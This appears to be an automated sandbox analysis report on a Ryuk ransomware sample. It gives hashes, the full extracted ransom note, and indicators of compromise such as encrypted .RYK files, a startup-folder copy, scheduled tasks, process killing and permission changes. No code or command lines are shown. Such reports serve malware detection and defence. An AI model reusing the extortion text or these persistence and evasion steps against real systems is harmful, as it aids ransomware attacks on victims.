ryuk | e895436da58025d7c077ab276708ee996125c811eb8d45f24e14d3facd9db10b

Analysis

max time kernel
151s
max time network
112s
platform
windows10-2004_x64
resource
win10v2004-20230221-en
resource tags

arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
submitted
11-03-2023 01:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
Size

767KB
MD5

d2e194259106bca3b42dc8690d340b59
SHA1

edcd63a3125854ed72cb5811f08644a87e265e3b
SHA256

788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc
SHA512

4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13
SSDEEP

12288:RnBkozA9lzIeVJ+OeO+OeNhBBhhBBUA9CGkIDIP6J9kgnDC3TbqUttRrvCsZ+nt2:jkozAjK95DIP4DCDbq8tRrvB

Score

10^/10

ryuk discovery evasion ransomware

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note

Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at [email protected] or [email protected] You will receive btc address for payment in the reply letter Ryuk No system is safe

Emails

[email protected]

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk
Disables Task Manager via registry modification
evasion

Drops startup file 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	attrib.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3476	icacls.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\O:	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened (read-only)	\??\S:	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened (read-only)	\??\T:	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened (read-only)	\??\I:	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened (read-only)	\??\J:	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened (read-only)	\??\K:	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened (read-only)	\??\L:	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened (read-only)	\??\N:	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened (read-only)	\??\U:	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened (read-only)	\??\A:	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened (read-only)	\??\V:	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened (read-only)	\??\Z:	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened (read-only)	\??\E:	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened (read-only)	\??\F:	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened (read-only)	\??\G:	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened (read-only)	\??\H:	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened (read-only)	\??\M:	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened (read-only)	\??\Q:	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened (read-only)	\??\W:	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened (read-only)	\??\Y:	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened (read-only)	\??\B:	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened (read-only)	\??\P:	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened (read-only)	\??\R:	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened (read-only)	\??\X:	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\cs-cz\ui-strings.js.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\wordEtw.man.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Bibliography\Sort\YEAR.XSL.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\MSB1XTOR.DLL.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\it-it\ui-strings.js.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\EXPTOOWS.DLL.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fi-fi\ui-strings.js.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-api-annotations-common.xml.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Templates\1033\QuizShow.potx.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia.api.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_es_135x40.svg.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\iw_get.svg.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\CENTURY.TTF.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-down.gif.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\tr-tr\ui-strings.js.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected].[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\icons_ie8.gif.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\QRCode.pmp.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fi-fi\ui-strings.js.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\it-it\ui-strings.js.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\sql70.xsl.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sk-sk\ui-strings.js.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_CA\en_CA.dic.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\oracle.gif.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\sa-jdi.jar.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\MSYH.TTC.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_hover.png.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\mk.pak.DATA.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-spi-actions.jar.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019R_Retail-ppd.xrm-ms.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PROOF\LTSHYPH_EN.LEX.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOIDCLIL.DLL.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon.png.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ug.txt.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-core-windows.xml.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\rsod\office32ww.msi.16.x-none.tree.dat.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\icons_retina.png.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected].[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\root\ui-strings.js.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail3-ul-oob.xrm-ms.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_OEM_Perp-pl.xrm-ms.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\next-arrow-down.svg.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest1-ul-oob.xrm-ms.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProCO365R_Subscription-ppd.xrm-ms.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluError_136x136.svg.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\plugin.js.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\core_icons_fw.png.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Bibliography\Author2String.XSL.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART3.BDR.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_radio_selected_18.svg.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\include\jvmti.h.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.properties.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-core-kit.xml.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\css\main.css.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\it_get.svg.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Grace-ul-oob.xrm-ms.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Subscription2-ul-oob.xrm-ms.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProVL_MAK-pl.xrm-ms.[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected].[[email protected]].RYK	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4312	schtasks.exe
4000	schtasks.exe
2904	schtasks.exe
4428	schtasks.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
1792	taskkill.exe
1428	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe
2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1792	taskkill.exe
Token: SeDebugPrivilege	1428	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2124 wrote to memory of 2360	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	88
PID 2124 wrote to memory of 2360	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	88
PID 2124 wrote to memory of 2360	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	88
PID 2360 wrote to memory of 2904	2360	cmd.exe	89
PID 2360 wrote to memory of 2904	2360	cmd.exe	89
PID 2360 wrote to memory of 2904	2360	cmd.exe	89
PID 2124 wrote to memory of 1484	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	90
PID 2124 wrote to memory of 1484	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	90
PID 2124 wrote to memory of 1484	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	90
PID 2124 wrote to memory of 3396	2124	788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe	91
